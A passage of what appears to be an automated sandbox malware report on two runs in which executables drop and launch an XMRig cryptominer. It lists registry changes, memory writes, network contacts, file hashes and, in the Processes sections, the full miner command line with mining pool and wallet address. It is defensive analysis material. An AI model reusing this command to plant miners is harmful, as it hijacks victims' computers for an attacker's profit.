memory/2776-49-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-50-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-51-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-52-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-53-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-54-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-55-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-56-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-57-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-58-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-59-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-60-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-61-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-62-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-63-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-64-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-65-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-66-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-67-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-68-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-69-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-70-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-71-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-72-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-73-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-74-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-75-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-76-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-77-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-78-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-79-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-80-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-81-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-82-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-83-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-84-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:28
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4044 wrote to memory of 3672 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4044 wrote to memory of 3672 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3672-16-0x000001D2E48E0000-0x000001D2E4900000-memory.dmp
memory/3672-17-0x000001D376CB0000-0x000001D376CD0000-memory.dmp
memory/3672-18-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-20-0x000001D377320000-0x000001D377340000-memory.dmp
memory/3672-19-0x000001D3770F0000-0x000001D377110000-memory.dmp
memory/3672-21-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-22-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-25-0x000001D377320000-0x000001D377340000-memory.dmp
memory/3672-24-0x000001D3770F0000-0x000001D377110000-memory.dmp
memory/3672-23-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-26-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-27-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-28-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-29-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-30-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-31-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-32-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-33-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-34-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-35-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-36-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-37-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-38-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-39-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-40-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-41-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-42-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-43-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-44-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-45-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-46-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-47-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-48-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-49-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-50-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-51-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-52-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-53-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-54-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-55-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-56-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-57-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-58-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-59-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-60-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-61-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-62-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-63-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-64-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-65-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-66-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-67-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-68-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-69-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-70-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-71-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-72-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-73-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-74-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-75-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-76-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-77-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-78-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-79-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-80-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-81-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-82-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-83-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-84-0x00007FF791D30000-0x00007FF792833000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:27
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 408 wrote to memory of 3320 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 408 wrote to memory of 3320 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.116.69.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3320-16-0x0000024A018A0000-0x0000024A018C0000-memory.dmp
memory/3320-17-0x0000024A018F0000-0x0000024A01910000-memory.dmp
memory/3320-18-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-19-0x0000024A01910000-0x0000024A01930000-memory.dmp
memory/3320-20-0x0000024A01930000-0x0000024A01950000-memory.dmp
memory/3320-21-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-22-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-23-0x0000024A01910000-0x0000024A01930000-memory.dmp
memory/3320-25-0x0000024A01930000-0x0000024A01950000-memory.dmp
memory/3320-24-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-26-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-27-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-28-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-29-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-30-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-31-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-32-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-33-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-34-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-35-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-36-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-37-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-38-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-39-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-40-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-41-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
